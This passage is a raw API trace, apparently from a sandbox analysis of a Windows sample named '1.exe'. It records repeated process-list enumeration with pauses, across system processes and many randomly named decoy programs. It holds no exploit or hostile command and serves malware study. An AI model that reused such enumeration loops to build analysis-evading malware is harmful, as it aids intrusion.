dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0066.503] GetLastError () returned 0x12 [0066.503] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0066.503] CloseHandle (hObject=0x300) returned 1 [0066.503] Sleep (dwMilliseconds=0x1f4) [0067.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0067.310] Process32FirstW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0067.311] GetLastError () returned 0x12 [0067.311] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0067.312] GetLastError () returned 0x12 [0067.312] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0067.313] GetLastError () returned 0x12 [0067.313] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0067.314] GetLastError () returned 0x12 [0067.314] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0067.314] GetLastError () returned 0x12 [0067.314] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0067.315] GetLastError () returned 0x12 [0067.315] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0067.316] GetLastError () returned 0x12 [0067.316] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0067.316] GetLastError () returned 0x12 [0067.316] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0067.317] GetLastError () returned 0x12 [0067.317] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.318] GetLastError () returned 0x12 [0067.318] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0067.318] GetLastError () returned 0x12 [0067.318] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0067.319] GetLastError () returned 0x12 [0067.319] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.320] GetLastError () returned 0x12 [0067.320] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0067.321] GetLastError () returned 0x12 [0067.321] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.321] GetLastError () returned 0x12 [0067.321] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.322] GetLastError () returned 0x12 [0067.322] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.323] GetLastError () returned 0x12 [0067.323] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.324] GetLastError () returned 0x12 [0067.324] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.324] GetLastError () returned 0x12 [0067.324] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.325] GetLastError () returned 0x12 [0067.325] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.326] GetLastError () returned 0x12 [0067.326] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.327] GetLastError () returned 0x12 [0067.327] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.327] GetLastError () returned 0x12 [0067.327] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0067.328] GetLastError () returned 0x12 [0067.328] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.329] GetLastError () returned 0x12 [0067.329] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.329] GetLastError () returned 0x12 [0067.329] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0067.330] GetLastError () returned 0x12 [0067.330] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0067.331] GetLastError () returned 0x12 [0067.331] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.331] GetLastError () returned 0x12 [0067.331] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0067.332] GetLastError () returned 0x12 [0067.332] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0067.333] GetLastError () returned 0x12 [0067.333] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0067.334] GetLastError () returned 0x12 [0067.334] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0067.334] GetLastError () returned 0x12 [0067.334] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0067.335] GetLastError () returned 0x12 [0067.335] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0067.336] GetLastError () returned 0x12 [0067.336] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0067.337] GetLastError () returned 0x12 [0067.337] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0067.337] GetLastError () returned 0x12 [0067.337] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0067.338] GetLastError () returned 0x12 [0067.338] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0068.149] GetLastError () returned 0x12 [0068.149] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0068.150] GetLastError () returned 0x12 [0068.150] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0068.151] GetLastError () returned 0x12 [0068.151] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0068.151] GetLastError () returned 0x12 [0068.151] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0068.152] GetLastError () returned 0x12 [0068.152] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0068.153] GetLastError () returned 0x12 [0068.153] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0068.157] GetLastError () returned 0x12 [0068.157] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0068.158] GetLastError () returned 0x12 [0068.158] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0068.159] GetLastError () returned 0x12 [0068.159] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0068.160] GetLastError () returned 0x12 [0068.160] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0068.160] GetLastError () returned 0x12 [0068.160] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0068.161] GetLastError () returned 0x12 [0068.161] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0068.162] GetLastError () returned 0x12 [0068.162] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0068.163] GetLastError () returned 0x12 [0068.163] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0068.163] GetLastError () returned 0x12 [0068.163] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0068.164] GetLastError () returned 0x12 [0068.164] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0068.165] GetLastError () returned 0x12 [0068.165] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0068.166] GetLastError () returned 0x12 [0068.166] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0068.166] GetLastError () returned 0x12 [0068.166] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0068.167] GetLastError () returned 0x12 [0068.167] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0068.168] GetLastError () returned 0x12 [0068.168] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0068.169] GetLastError () returned 0x12 [0068.169] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0068.171] GetLastError () returned 0x12 [0068.171] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0068.172] GetLastError () returned 0x12 [0068.172] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0068.173] GetLastError () returned 0x12 [0068.173] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0068.174] GetLastError () returned 0x12 [0068.174] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0068.175] GetLastError () returned 0x12 [0068.175] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0068.176] GetLastError () returned 0x12 [0068.176] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0068.177] GetLastError () returned 0x12 [0068.177] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0068.178] GetLastError () returned 0x12 [0068.178] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0068.179] GetLastError () returned 0x12 [0068.179] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0068.179] GetLastError () returned 0x12 [0068.179] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0068.180] GetLastError () returned 0x12 [0068.180] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0068.181] GetLastError () returned 0x12 [0068.181] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0068.182] GetLastError () returned 0x12 [0068.182] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 